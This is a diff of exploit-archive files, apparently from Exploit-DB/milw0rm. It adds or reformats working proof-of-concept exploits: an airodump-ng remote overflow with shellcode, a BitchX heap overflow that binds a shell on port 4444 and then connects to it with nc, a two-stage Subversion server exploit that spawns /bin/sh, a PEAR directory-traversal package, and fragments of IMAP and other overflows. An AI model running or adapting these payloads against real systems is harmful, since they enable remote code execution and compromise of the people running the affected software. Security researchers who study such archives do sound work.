-d 0 --setseq 0xc0c4c014 --setack 0xffffffff \
1>/dev/null 2>/dev/null
rm egg
echo "Exploit Sended"
# milw0rm.com [2003-04-23]

View file

@ -38,6 +38,6 @@ for ($i += length($shellcode); $i < $len; $i += 4) {
$exploit_string = "* AUTHENTICATE {$len}\015\012$buffer\012";
system("(echo -e \"$exploit_string\" ; cat) | nc $target 143");
# milw0rm.com [2001-01-19]
# milw0rm.com [2001-01-19]

View file

@ -236,6 +236,6 @@ int main(int argc, char **argv) {
close(sock);
return 0;
}
// milw0rm.com [2001-03-03]
}
// milw0rm.com [2001-03-03]

View file

@ -91,6 +91,6 @@ Ruben Garrote Garc
rubengarrote [at] gmail [dot] com
http://boken00.blogspot.com
EDB Note:
It seems 3.70 version has been patched against this.
Later versions are probably vulnerable to this.
## EDB Note:
# It seems 3.70 version currently available for download
# has been patched against this. Earlier versions are probably vulnerable to this.

14
platforms/linux/remote/30018.py Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/23887/info
Python applications that use the 'PyLocale_strxfrm' function are prone to an information leak.
Exploiting this issue allows remote attackers to read portions of memory.
Python 2.4.4-2 and 2.5 are confirmed vulnerable.
#!/usr/bin/python
import locale
print locale.setlocale(locale.LC_COLLATE, 'pl_PL.UTF8')
print repr(locale.strxfrm('a'))

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24004/info
Sun JDK is prone to a multiple vulnerabilities.
An attacker can exploit these issues to crash the affected application, effectively denying service. The attacker may also be able to execute arbitrary code, which may facilitate a compromise of the underlying system.
Sun JDK 1.5.0_07-b03 is vulnerable to these issues; other versions may also be affected.
http://www.exploit-db.com/sploits/30043.zip

View file

@ -0,0 +1,70 @@
source: http://www.securityfocus.com/bid/24111/info
PEAR is prone to a vulnerability that lets attackers overwrite arbitrary files.
An attacker-supplied package may supply directory-traversal strings through the 'install-as' attribute to create and overwrite files in arbitrary locations.
This issue affects PEAR 1.0 to 1.5.3.
create a file named "INSTALL" and save it in the current directory.
Save the following XML as package.xml, and run "pear install package.xml"
If php_dir is /usr/local/lib/php The file "INSTALL" will be installed into
/usr/local/test.php
<?xml version="1.0" encoding="UTF-8"?>
<package version="2.0" xmlns="http://pear.php.net/dtd/package-2.0"
xmlns:tasks="http://pear.php.net/dtd/tasks-1.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://pear.php.net/dtd/tasks-1.0
http://pear.php.net/dtd/tasks-1.0.xsd
http://pear.php.net/dtd/package-2.0
http://pear.php.net/dtd/package-2.0.xsd">
<name>Test_Sec</name>
<channel>pear.php.net</channel>
<summary>Test security vulnerability</summary>
<description>demonstrate install-as vulnerability
</description>
<lead>
<name>Greg Beaver</name>
<user>cellog</user>
<email>cellog@php.net</email>
<active>yes</active>
</lead>
<date>2007-03-05</date>
<version>
<release>1.6.0</release>
<api>1.6.0</api>
</version>
<stability>
<release>stable</release>
<api>stable</api>
</stability>
<license uri="http://www.php.net/license">PHP License</license>
<notes>
allow up to latest beta version [tias]
</notes>
<contents>
<dir name="/">
<file name="INSTALL" role="php" />
</dir> <!-- / -->
</contents>
<dependencies>
<required>
<php>
<min>4.3.0</min>
</php>
<pearinstaller>
<min>1.4.3</min>
</pearinstaller>
</required>
</dependencies>
<phprelease>
<filelist>
<install as="../../test.php" name="INSTALL" />
</filelist>
</phprelease>
</package>

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24161/info
Ruby on Rails is prone to a script-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
This issue affects Ruby on Rails 1.2.3; other versions may also be affected.
http://www.exploit-db.com/sploits/30089.tgz

View file

@ -1,186 +1,186 @@
/**
* airodump-exp.c - aircrack/airodump-ng (0.7) remote exploit
*
* Proof of concept exploit for a stack (and heap) based
* overflow in airodump-ng. The vulnerability can be exploited
* by transmitting some specially crafted 802.11 packets to
* execute arbitrary code on any machines within range
* that are sniffing with a vulnerable version of airodump-ng.
*
* This exploit requires the lorcon 802.11 packet injection
* library, see http://802.11ninja.net for details.
*
* Compiling:
*
* gcc -o airodump-remote airodump-remote.c -lorcon
*
* Usage:
*
* ./airodump-ng <interface> <driver> <channel> <headertype> [return addr]
*
* Drivers supported by lorcon:
*
* wlan-ng, hostap, airjack, prism54, madwifing, madwifiold,
* rtl8180, rt2570, rt2500, rt73, rt61, zd1211rw
*
* Header types:
*
* 0 - None (not tested)
* 1 - Fake prism54 header
* 2 - Fake radiotap header (not tested)
*
* Return addresses:
*
* Backtrack Linux 2 (2.6.20) aircrack-ng 0.7 - 0x8054934
* Gentoo Linux (2.6.16) aircrack-ng 0.7 - 0x8055934
*
* Example usage:
*
* ./airodump-ng wlan0 prism54 11 1 0x8054934
*
* Original advisory: http://www.nop-art.net/advisories/airodump-ng.txt
* Author: Jonathan So [ jonny [ @ ] nop-art.net ]
*
* Copyright (C) 2007 Jonathan So
*/
#include <stdio.h>
#include <stdlib.h>
#include <tx80211.h>
// Linux x86 sys_write shellcode. Any arbitrary shellcode should work
// here, it doesn't matter if it contains nulls. Maximum 792 bytes.
char shellcode[] = "\xeb\x14" // jmp get_message
// start:
"\x59\x31\xdb\x31\xd2\xb2"
"\x1b" // message length
"\x31\xc0\x88\x04\x11"
"\xb0\x04\xcd\x80" // sys_write
"\xb0\x01\xcd\x80" // sys_exit
// get_message:
"\xe8\xe7\xff\xff\xff" // call start
"Stop sniffing our network!!"; // message text
int main(int argc, char **argv)
{
tx80211_t tx;
tx80211_packet_t txp;
uint8_t packet[1044];
uint8_t *ppacket;
int headertype;
unsigned ret_addr = 0x8054934;
FILE *fp;
if(argc<5) {
printf("usage: %s <interface> <driver> <channel> <arptype>
[ret_addr]\n", argv[0]);
exit(1);
}
if(argc>5) {
ret_addr = strtoul(argv[5], NULL, 16);
}
headertype = atoi(argv[4]);
if ( tx80211_init(&tx, argv[1], tx80211_resolvecard(argv[2])) !=
TX80211_ENOERR) {
fprintf(stderr, "Error initializing driver");
return 1;
}
if (tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON) !=
TX80211_ENOERR) {
fprintf(stderr, "Error setting inject mode\n");
return 1;
}
if (tx80211_setchannel(&tx, atoi(argv[3])) < 0) {
fprintf(stderr, "Error setting channel\n");
}
if (tx80211_open(&tx) < 0) {
fprintf(stderr, "Unable to open interface\n");
return 1;
}
txp.packet = packet;
// Fill packet with nops
memset(packet, 0x90, sizeof(packet));
switch (headertype) {
case 0:
// No arptype, just send raw packet
ppacket = packet;
break;
case 1:
// Send fake prism header
memcpy(packet+4, "\x08\x00\x00\x00", 4);
ppacket = packet + 8;
break;
case 2:
// Send fake radiotap header
packet[0] = 0;
packet[2] = 3;
ppacket = packet + 3;
break;
default:
printf("Invalid header type. Valid options are:\n");
printf(" 0 - none\n");
printf(" 1 - prism54\n");
printf(" 2 - radiotap\n");
return 1;
}
// set some necessary 802.11 header fields
ppacket[0] = 0xB0;
ppacket[1] = 0;
ppacket[24] = 1;
ppacket[25] = 0;
ppacket[26] = 2;
ppacket[27] = 0;
txp.plen = 512 + (ppacket - packet);
if (tx80211_txpacket(&tx, &txp) < txp.plen) {
fprintf(stderr, "Error sending packet 1\n");
return 1;
}
ppacket[26] = 4;
if (tx80211_txpacket(&tx, &txp) < txp.plen) {
fprintf(stderr, "Error sending packet 2\n");
return 1;
}
// Insert shellcode at end of nopsled
memcpy(ppacket+(820-sizeof(shellcode)), shellcode, sizeof(shellcode));
// Overwrite some char*, needs to be a valid address
memcpy(ppacket+1028, &ret_addr, 4);
// Overwrite global variable sk_len, used as argument to memcpy
memcpy(ppacket+1032, "\x20\x05\x00\x00", 4);
// Return address
memcpy(ppacket+820, &ret_addr, 4);
ppacket[1] = 0x40;
txp.plen = 1036 + + (ppacket - packet);
if (tx80211_txpacket(&tx, &txp) < txp.plen) {
fprintf(stderr, "Error sending packet 3\n");
return 1;
}
tx80211_close(&tx);
return 0;
}
// milw0rm.com [2007-04-12]
/**
* airodump-exp.c - aircrack/airodump-ng (0.7) remote exploit
*
* Proof of concept exploit for a stack (and heap) based
* overflow in airodump-ng. The vulnerability can be exploited
* by transmitting some specially crafted 802.11 packets to
* execute arbitrary code on any machines within range
* that are sniffing with a vulnerable version of airodump-ng.
*
* This exploit requires the lorcon 802.11 packet injection
* library, see http://802.11ninja.net for details.
*
* Compiling:
*
* gcc -o airodump-remote airodump-remote.c -lorcon
*
* Usage:
*
* ./airodump-ng <interface> <driver> <channel> <headertype> [return addr]
*
* Drivers supported by lorcon:
*
* wlan-ng, hostap, airjack, prism54, madwifing, madwifiold,
* rtl8180, rt2570, rt2500, rt73, rt61, zd1211rw
*
* Header types:
*
* 0 - None (not tested)
* 1 - Fake prism54 header
* 2 - Fake radiotap header (not tested)
*
* Return addresses:
*
* Backtrack Linux 2 (2.6.20) aircrack-ng 0.7 - 0x8054934
* Gentoo Linux (2.6.16) aircrack-ng 0.7 - 0x8055934
*
* Example usage:
*
* ./airodump-ng wlan0 prism54 11 1 0x8054934
*
* Original advisory: http://www.nop-art.net/advisories/airodump-ng.txt
* Author: Jonathan So [ jonny [ @ ] nop-art.net ]
*
* Copyright (C) 2007 Jonathan So
*/
#include <stdio.h>
#include <stdlib.h>
#include <tx80211.h>
// Linux x86 sys_write shellcode. Any arbitrary shellcode should work
// here, it doesn't matter if it contains nulls. Maximum 792 bytes.
char shellcode[] = "\xeb\x14" // jmp get_message
// start:
"\x59\x31\xdb\x31\xd2\xb2"
"\x1b" // message length
"\x31\xc0\x88\x04\x11"
"\xb0\x04\xcd\x80" // sys_write
"\xb0\x01\xcd\x80" // sys_exit
// get_message:
"\xe8\xe7\xff\xff\xff" // call start
"Stop sniffing our network!!"; // message text
int main(int argc, char **argv)
{
tx80211_t tx;
tx80211_packet_t txp;
uint8_t packet[1044];
uint8_t *ppacket;
int headertype;
unsigned ret_addr = 0x8054934;
FILE *fp;
if(argc<5) {
printf("usage: %s <interface> <driver> <channel> <arptype>
[ret_addr]\n", argv[0]);
exit(1);
}
if(argc>5) {
ret_addr = strtoul(argv[5], NULL, 16);
}
headertype = atoi(argv[4]);
if ( tx80211_init(&tx, argv[1], tx80211_resolvecard(argv[2])) !=
TX80211_ENOERR) {
fprintf(stderr, "Error initializing driver");
return 1;
}
if (tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON) !=
TX80211_ENOERR) {
fprintf(stderr, "Error setting inject mode\n");
return 1;
}
if (tx80211_setchannel(&tx, atoi(argv[3])) < 0) {
fprintf(stderr, "Error setting channel\n");
}
if (tx80211_open(&tx) < 0) {
fprintf(stderr, "Unable to open interface\n");
return 1;
}
txp.packet = packet;
// Fill packet with nops
memset(packet, 0x90, sizeof(packet));
switch (headertype) {
case 0:
// No arptype, just send raw packet
ppacket = packet;
break;
case 1:
// Send fake prism header
memcpy(packet+4, "\x08\x00\x00\x00", 4);
ppacket = packet + 8;
break;
case 2:
// Send fake radiotap header
packet[0] = 0;
packet[2] = 3;
ppacket = packet + 3;
break;
default:
printf("Invalid header type. Valid options are:\n");
printf(" 0 - none\n");
printf(" 1 - prism54\n");
printf(" 2 - radiotap\n");
return 1;
}
// set some necessary 802.11 header fields
ppacket[0] = 0xB0;
ppacket[1] = 0;
ppacket[24] = 1;
ppacket[25] = 0;
ppacket[26] = 2;
ppacket[27] = 0;
txp.plen = 512 + (ppacket - packet);
if (tx80211_txpacket(&tx, &txp) < txp.plen) {
fprintf(stderr, "Error sending packet 1\n");
return 1;
}
ppacket[26] = 4;
if (tx80211_txpacket(&tx, &txp) < txp.plen) {
fprintf(stderr, "Error sending packet 2\n");
return 1;
}
// Insert shellcode at end of nopsled
memcpy(ppacket+(820-sizeof(shellcode)), shellcode, sizeof(shellcode));
// Overwrite some char*, needs to be a valid address
memcpy(ppacket+1028, &ret_addr, 4);
// Overwrite global variable sk_len, used as argument to memcpy
memcpy(ppacket+1032, "\x20\x05\x00\x00", 4);
// Return address
memcpy(ppacket+820, &ret_addr, 4);
ppacket[1] = 0x40;
txp.plen = 1036 + + (ppacket - packet);
if (tx80211_txpacket(&tx, &txp) < txp.plen) {
fprintf(stderr, "Error sending packet 3\n");
return 1;
}
tx80211_close(&tx);
return 0;
}
// milw0rm.com [2007-04-12]

View file

@ -180,6 +180,6 @@ close(sock);
return 0; }
return 0; }
// milw0rm.com [2004-08-24]
return 0; }
// milw0rm.com [2004-08-24]

View file

@ -1,123 +1,123 @@
#!/usr/bin/env ruby
######################################################
# BitchX-1.1 Final MODE Heap Overflow [0-day]
# By bannedit
# Discovered May 16th 2007
# - Yet another overflow which can overwrite GOT
#
# I found this vuln after modifying ilja's ircfuzz
# code. Currently this exploit attempts to
# overwrite the GOT with the ret address to the
# shellcode.
#
# The actually vulnerability appears to be a stack
# overflow in p_mode. Due to input size restrictions
# the overflow can't occur on the stack because we can
# only overflow so much data. Luckily though we
# overwrite a structure containing pointers to heap
# data. This allows us to overwrite the GOT.
#
# Reliability of this exploit in its current stage is
# limited. There appears to be several factors which
# restrict the reliability.
#######################################################
require 'socket'
#the linux 2.6 target most effective atm
targets = { 'linux 2.6' => '0x81861c8', 'linux 2.6 Hardened (FC6)' =>
'0x8154d70','freebsd' => '0x41414141' }
shellcode = #fork before binding a shell provides a clean exit
"\x6a\x02\x58\xcd\x80\x85\xc0\x74\x05\x6a\x01\x58\xcd\x80"+
#metasploit linux x86 shellcode bind tcp port 4444
"\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfc"+
"\x98\xd8\xb8\x83\xeb\xfc\xe2\xf4\xcd\x43\x8b\xfb\xaf\xf2\xda\xd2"+
"\x9a\xc0\x41\x31\x1d\x55\x58\x2e\xbf\xca\xbe\xd0\xed\xc4\xbe\xeb"+
"\x75\x79\xb2\xde\xa4\xc8\x89\xee\x75\x79\x15\x38\x4c\xfe\x09\x5b"+
"\x31\x18\x8a\xea\xaa\xdb\x51\x59\x4c\xfe\x15\x38\x6f\xf2\xda\xe1"+
"\x4c\xa7\x15\x38\xb5\xe1\x21\x08\xf7\xca\xb0\x97\xd3\xeb\xb0\xd0"+
"\xd3\xfa\xb1\xd6\x75\x7b\x8a\xeb\x75\x79\x15\x38"
port = (ARGV[0] || 6667).to_i
sock = TCPServer.new('0.0.0.0', port)
ret = (targets['linux 2.6 Hardened (FC6)'].hex)
puts "----------------------------------------------"
puts "- BitchX-1.1 Final Mode Heap Buffer Overflow -"
puts "- By bannedit -"
puts "----------------------------------------------"
puts "\n[-] listening for incoming clients..."
while (client = sock.accept)
ip = client.peeraddr
buffer = client.gets
puts "[<] #{buffer}"
hostname = ([ret].pack('V')) * 13
nick = "bannedit"
#Fake server reply to connection
buffer = ":#{nick} MODE #{nick} :+iw\r\n"+
":0 001 #{nick} :biznitch-1.0\r\n"+
":5 002 #{nick} :biznitch-1.0\r\n"+
":6 003 #{nick} :a\r\n"+
":aaa 004 #{nick} :a\r\n"+
":aaa 005 #{nick} :a\r\n"+
":aaa 251 #{nick} :a\r\n"+
":aaa 252 #{nick} :a\r\n"+
":aaa 253 #{nick} :a\r\n"+
":aaa 254 #{nick} :a\r\n"+
":aaa 255 #{nick} :a\r\n"+
":aaa 375 #{nick} :a\r\n"+
":aaa 372 #{nick} :a\r\n"+
":aaa 376 #{nick} :a\r\n"
join = ":aaa 302 #{nick} :#{nick}=+#{nick}@#{nick}\r\n"+
":#{nick}!#{nick}@#{hostname * 4} JOIN :#hackers\r\n"
puts "[>] sending fake server response"
client.send(buffer, 0)
sleep(2)
# client.send(join, 0)
topic = ":aaa TOPIC #hackers:"
ret = ret + 0x200
topic<< ([ret].pack('V')) * 100
topic<< "\r\n"
for i in 0..20
client.send(topic, 0)
end
puts "[>] sending evil buffer"
evilbuf = ":#{hostname} MODE "
evilbuf<< "#{nick} :aaa"
ret = ret + 0x200
evilbuf<< ([ret].pack('V')) * 200
evilbuf<< "\x90" * (1126 - shellcode.length)
evilbuf<< shellcode
evilbuf<< "\x90" * 40
evilbuf<< "\r\n"
for i in 0..5
client.send(evilbuf, 0)
end
sleep(10) #wait for the shellcode to do its thing...
puts "[+] exploit completed if successful port 4444 should be open"
puts "[+] connecting to #{ip[3]} on port 4444 and dropping shell...\n\n"
fork {
system("nc #{ip[3]} 4444")
puts "[+] exiting shell dropping back to listener"
}
end
# milw0rm.com [2007-08-27]
#!/usr/bin/env ruby
######################################################
# BitchX-1.1 Final MODE Heap Overflow [0-day]
# By bannedit
# Discovered May 16th 2007
# - Yet another overflow which can overwrite GOT
#
# I found this vuln after modifying ilja's ircfuzz
# code. Currently this exploit attempts to
# overwrite the GOT with the ret address to the
# shellcode.
#
# The actually vulnerability appears to be a stack
# overflow in p_mode. Due to input size restrictions
# the overflow can't occur on the stack because we can
# only overflow so much data. Luckily though we
# overwrite a structure containing pointers to heap
# data. This allows us to overwrite the GOT.
#
# Reliability of this exploit in its current stage is
# limited. There appears to be several factors which
# restrict the reliability.
#######################################################
require 'socket'
#the linux 2.6 target most effective atm
targets = { 'linux 2.6' => '0x81861c8', 'linux 2.6 Hardened (FC6)' =>
'0x8154d70','freebsd' => '0x41414141' }
shellcode = #fork before binding a shell provides a clean exit
"\x6a\x02\x58\xcd\x80\x85\xc0\x74\x05\x6a\x01\x58\xcd\x80"+
#metasploit linux x86 shellcode bind tcp port 4444
"\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfc"+
"\x98\xd8\xb8\x83\xeb\xfc\xe2\xf4\xcd\x43\x8b\xfb\xaf\xf2\xda\xd2"+
"\x9a\xc0\x41\x31\x1d\x55\x58\x2e\xbf\xca\xbe\xd0\xed\xc4\xbe\xeb"+
"\x75\x79\xb2\xde\xa4\xc8\x89\xee\x75\x79\x15\x38\x4c\xfe\x09\x5b"+
"\x31\x18\x8a\xea\xaa\xdb\x51\x59\x4c\xfe\x15\x38\x6f\xf2\xda\xe1"+
"\x4c\xa7\x15\x38\xb5\xe1\x21\x08\xf7\xca\xb0\x97\xd3\xeb\xb0\xd0"+
"\xd3\xfa\xb1\xd6\x75\x7b\x8a\xeb\x75\x79\x15\x38"
port = (ARGV[0] || 6667).to_i
sock = TCPServer.new('0.0.0.0', port)
ret = (targets['linux 2.6 Hardened (FC6)'].hex)
puts "----------------------------------------------"
puts "- BitchX-1.1 Final Mode Heap Buffer Overflow -"
puts "- By bannedit -"
puts "----------------------------------------------"
puts "\n[-] listening for incoming clients..."
while (client = sock.accept)
ip = client.peeraddr
buffer = client.gets
puts "[<] #{buffer}"
hostname = ([ret].pack('V')) * 13
nick = "bannedit"
#Fake server reply to connection
buffer = ":#{nick} MODE #{nick} :+iw\r\n"+
":0 001 #{nick} :biznitch-1.0\r\n"+
":5 002 #{nick} :biznitch-1.0\r\n"+
":6 003 #{nick} :a\r\n"+
":aaa 004 #{nick} :a\r\n"+
":aaa 005 #{nick} :a\r\n"+
":aaa 251 #{nick} :a\r\n"+
":aaa 252 #{nick} :a\r\n"+
":aaa 253 #{nick} :a\r\n"+
":aaa 254 #{nick} :a\r\n"+
":aaa 255 #{nick} :a\r\n"+
":aaa 375 #{nick} :a\r\n"+
":aaa 372 #{nick} :a\r\n"+
":aaa 376 #{nick} :a\r\n"
join = ":aaa 302 #{nick} :#{nick}=+#{nick}@#{nick}\r\n"+
":#{nick}!#{nick}@#{hostname * 4} JOIN :#hackers\r\n"
puts "[>] sending fake server response"
client.send(buffer, 0)
sleep(2)
# client.send(join, 0)
topic = ":aaa TOPIC #hackers:"
ret = ret + 0x200
topic<< ([ret].pack('V')) * 100
topic<< "\r\n"
for i in 0..20
client.send(topic, 0)
end
puts "[>] sending evil buffer"
evilbuf = ":#{hostname} MODE "
evilbuf<< "#{nick} :aaa"
ret = ret + 0x200
evilbuf<< ([ret].pack('V')) * 200
evilbuf<< "\x90" * (1126 - shellcode.length)
evilbuf<< shellcode
evilbuf<< "\x90" * 40
evilbuf<< "\r\n"
for i in 0..5
client.send(evilbuf, 0)
end
sleep(10) #wait for the shellcode to do its thing...
puts "[+] exploit completed if successful port 4444 should be open"
puts "[+] connecting to #{ip[3]} on port 4444 and dropping shell...\n\n"
fork {
system("nc #{ip[3]} 4444")
puts "[+] exiting shell dropping back to listener"
}
end
# milw0rm.com [2007-08-27]

View file

@ -1,328 +1,328 @@
/*****************************************************************
* hoagie_subversion.c
*
* Remote exploit against Subversion-Servers.
*
* Author: greuff <greuff@void.at>
*
* Tested on Subversion 1.0.0 and 0.37
*
* Algorithm:
* This is a two-stage exploit. The first stage overflows a buffer
* on the stack and leaves us ~60 bytes of machine code to be
* executed. We try to find the socket-fd there and then do a
* read(2) on the socket. The exploit then sends the second stage
* loader to the server, which can be of any length (up to the
* obvious limits, of course). This second stage loader spawns
* /bin/sh on the server and connects it to the socket-fd.
*
* Credits:
* void.at
*
* THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-CONCEPT.
* THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE OR
* CRIMINAL ACTIVITIES DONE USING THIS PROGRAM.
*
*****************************************************************/
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>
enum protocol { SVN, SVNSSH, HTTP, HTTPS };
char stage1loader[]=
// begin socket fd search
"\x31\xdb" // xor %ebx, %ebx
"\x90" // nop (UTF-8)
"\x53" // push %ebx
"\x58" // pop %eax
"\x50" // push %eax
"\x5f" // pop %edi # %eax = %ebx = %edi = 0
"\x2c\x40" // sub $0x40, %al
"\x50" // push %eax
"\x5b" // pop %ebx
"\x50" // push %eax
"\x5a" // pop %edx # %ebx = %edx = 0xC0
"\x57" // push %edi
"\x57" // push %edi # safety-0
"\x54" // push %esp
"\x59" // pop %ecx # %ecx = pointer to the buffer
"\x4b" // dec %ebx # beginloop:
"\x57" // push %edi
"\x58" // pop %eax # clear %eax
"\xd6" // salc (UTF-8)
"\xb0\x60" // movb $0x60, %al
"\x2c\x44" // sub $0x44, %al # %eax = 0x1C
"\xcd\x80" // int $0x80 # fstat(i, &stat)
"\x58" // pop %eax
"\x58" // pop %eax
"\x50" // push %eax
"\x50" // push %eax
"\x38\xd4" // cmp %dl, %ah # uppermost 2 bits of st_mode set?
"\x90" // nop (UTF-8)
"\x72\xed" // jb beginloop
"\x90" // nop (UTF-8)
"\x90" // nop (UTF-8) # %ebx now contains the socket fd
// begin read(2)
"\x57" // push %edi
"\x58" // pop %eax # zero %eax
"\x40" // inc %eax
"\x40" // inc %eax
"\x40" // inc %eax # %eax=3
//"\x54" // push %esp
//"\x59" // pop %ecx # %ecx ... address of buffer
//"\x54" // push %edi
//"\x5a" // pop %edx # %edx ... bufferlen (0xC0)
"\xcd\x80" // int $0x80 # read(2) second stage loader
"\x39\xc7" // cmp %eax, %edi
"\x90" // nop (UTF-8)
"\x7f\xf3" // jg startover
"\x90" // nop (UTF-8)
"\x90" // nop (UTF-8)
"\x90" // nop (UTF-8)
"\x54" // push %esp
"\xc3" // ret # execute second stage loader
"\x90" // nop (UTF-8)
"\0" // %ebx still contains the fd we can use in the 2nd stage loader.
;
char stage2loader[]=
// dup2 - %ebx contains the fd
"\xb8\x3f\x00\x00\x00" // mov $0x3F, %eax
"\xb9\x00\x00\x00\x00" // mov $0x0, %ecx
"\xcd\x80" // int $0x80
"\xb8\x3f\x00\x00\x00" // mov $0x3F, %eax
"\xb9\x01\x00\x00\x00" // mov $0x1, %ecx
"\xcd\x80" // int $0x80
"\xb8\x3f\x00\x00\x00" // mov $0x3F, %eax
"\xb9\x02\x00\x00\x00" // mov $0x2, %ecx
"\xcd\x80" // int $0x80
// start /bin/sh
"\x31\xd2" // xor %edx, %edx
"\x52" // push %edx
"\x68\x6e\x2f\x73\x68" // push $0x68732f6e
"\x68\x2f\x2f\x62\x69" // push $0x69622f2f
"\x89\xe3" // mov %esp, %ebx
"\x52" // push %edx
"\x53" // push %ebx
"\x89\xe1" // mov %esp, %ecx
"\xb8\x0b\x00\x00\x00" // mov $0xb, %eax
"\xcd\x80" // int $0x80
"\xb8\x01\x00\x00\x00" // mov $0x1, %eax
"\xcd\x80" // int %0x80 (exit)
;
int stage2loaderlen=69;
char requestfmt[]=
"REPORT %s HTTP/1.1\n"
"Host: %s\n"
"User-Agent: SVN/0.37.0 (r8509) neon/0.24.4\n"
"Content-Length: %d\n"
"Content-Type: text/xml\n"
"Connection: close\n\n"
"%s\n";
char xmlreqfmt[]=
"<?xml version=\"1.0\" encoding=\"utf-8\"?>"
"<S:dated-rev-report xmlns:S=\"svn:\" xmlns:D=\"DAV:\">"
"<D:creationdate>%s%c%c%c%c</D:creationdate>"
"</S:dated-rev-report>";
int parse_uri(char *uri,enum protocol *proto,char host[1000],int *port,char repos[1000])
{
char *ptr;
char bfr[1000];
ptr=strstr(uri,"://");
if(!ptr) return -1;
*ptr=0;
snprintf(bfr,sizeof(bfr),"%s",uri);
if(!strcmp(bfr,"http"))
*proto=HTTP, *port=80;
else if(!strcmp(bfr,"svn"))
*proto=SVN, *port=3690;
else
{
printf("Unsupported protocol %s\n",bfr);
return -1;
}
uri=ptr+3;
if((ptr=strchr(uri,':')))
{
*ptr=0;
snprintf(host,1000,"%s",uri);
uri=ptr+1;
if((ptr=strchr(uri,'/'))==NULL) return -1;
*ptr=0;
snprintf(bfr,1000,"%s",uri);
*port=(int)strtol(bfr,NULL,10);
*ptr='/';
uri=ptr;
}
else if((ptr=strchr(uri,'/')))
{
*ptr=0;
snprintf(host,1000,"%s",uri);
*ptr='/';
uri=ptr;
}
snprintf(repos,1000,"%s",uri);
return 0;
}
int exec_sh(int sockfd)
{
char snd[4096],rcv[4096];
fd_set rset;
while(1)
{
FD_ZERO(&rset);
FD_SET(fileno(stdin),&rset);
FD_SET(sockfd,&rset);
select(255,&rset,NULL,NULL,NULL);
if(FD_ISSET(fileno(stdin),&rset))
{
memset(snd,0,sizeof(snd));
fgets(snd,sizeof(snd),stdin);
write(sockfd,snd,strlen(snd));
}
if(FD_ISSET(sockfd,&rset))
{
memset(rcv,0,sizeof(rcv));
if(read(sockfd,rcv,sizeof(rcv))<=0)
exit(0);
fputs(rcv,stdout);
}
}
}
int main(int argc, char **argv)
{
int sock, port;
size_t size;
char cmd[1000], reply[1000], buffer[1000];
char svdcmdline[1000];
char host[1000], repos[1000], *ptr, *caddr;
unsigned long addr;
struct sockaddr_in sin;
struct hostent *he;
enum protocol proto;
/*sock=open("output",O_CREAT|O_TRUNC|O_RDWR,0666);
write(sock,stage1loader,strlen(stage1loader));
close(sock);
return 0;*/
printf("hoagie_subversion - remote exploit against subversion servers\n"
"by greuff@void.at\n\n");
if(argc!=3)
{
printf("Usage: %s serverurl offset\n\n",argv[0]);
printf("Examples:\n"
" %s svn://localhost/repository 0x41414141\n"
" %s http://victim.com:6666/svn 0x40414336\n\n",argv[0],argv[0]);
printf("The offset is an alphanumeric address (or UTF-8 to be\n"
"more precise) of a pop instruction, followed by a ret.\n"
"Brute force when in doubt.\n\n");
printf("When exploiting against an svn://-url, you can supply a\n"
"binary offset too.\n\n");
exit(1);
}
// parse the URI
snprintf(svdcmdline,sizeof(svdcmdline),"%s",argv[1]);
if(parse_uri(argv[1],&proto,host,&port,repos)<0)
{
printf("URI parse error\n");
exit(1);
}
printf("parse_uri result:\n"
"Protocol: %d\n"
"Host: %s\n"
"Port: %d\n"
"Repository: %s\n\n",proto,host,port,repos);
addr=strtoul(argv[2],NULL,16);
caddr=(char *)&addr;
printf("Using offset 0x%02x%02x%02x%02x\n",caddr[3],caddr[2],caddr[1],caddr[0]);
sock=socket(AF_INET,SOCK_STREAM,0);
if(sock<0)
{
perror("socket");
return -1;
}
he=gethostbyname(host);
if(he==NULL)
{
herror("gethostbyname");
return -1;
}
sin.sin_family=AF_INET;
sin.sin_port=htons(port);
memcpy(&sin.sin_addr.s_addr,he->h_addr,sizeof(he->h_addr));
if(connect(sock,(struct sockaddr *)&sin,sizeof(sin))<0)
{
perror("connect");
return -1;
}
if(proto==SVN)
{
size=read(sock,reply,sizeof(reply));
reply[size]=0;
printf("Server said: %s\n",reply);
snprintf(cmd,sizeof(cmd),"( 2 ( edit-pipeline ) %d:%s ) ",strlen(svdcmdline),svdcmdline);
write(sock,cmd,strlen(cmd));
size=read(sock,reply,sizeof(reply));
reply[size]=0;
printf("Server said: %s\n",reply);
strcpy(cmd,"( ANONYMOUS ( 0: ) ) ");
write(sock,cmd,strlen(cmd));
size=read(sock,reply,sizeof(reply));
reply[size]=0;
printf("Server said: %s\n",reply);
snprintf(cmd,sizeof(cmd),"( get-dated-rev ( %d:%s%c%c%c%c ) ) ",strlen(stage1loader)+4,stage1loader,
caddr[0],caddr[1],caddr[2],caddr[3]);
write(sock,cmd,strlen(cmd));
size=read(sock,reply,sizeof(reply));
reply[size]=0;
printf("Server said: %s\n",reply);
}
else if(proto==HTTP)
{
// preparing the request...
snprintf(buffer,sizeof(buffer),xmlreqfmt,stage1loader,
caddr[0],caddr[1],caddr[2],caddr[3]);
size=strlen(buffer);
snprintf(cmd,sizeof(cmd),requestfmt,repos,host,size,buffer);
// now sending the request, immediately followed by the 2nd stage loader
printf("Sending:\n%s",cmd);
write(sock,cmd,strlen(cmd));
sleep(1);
write(sock,stage2loader,stage2loaderlen);
}
// SHELL LOOP
printf("Entering shell loop...\n");
exec_sh(sock);
/*sleep(1);
close(sock);
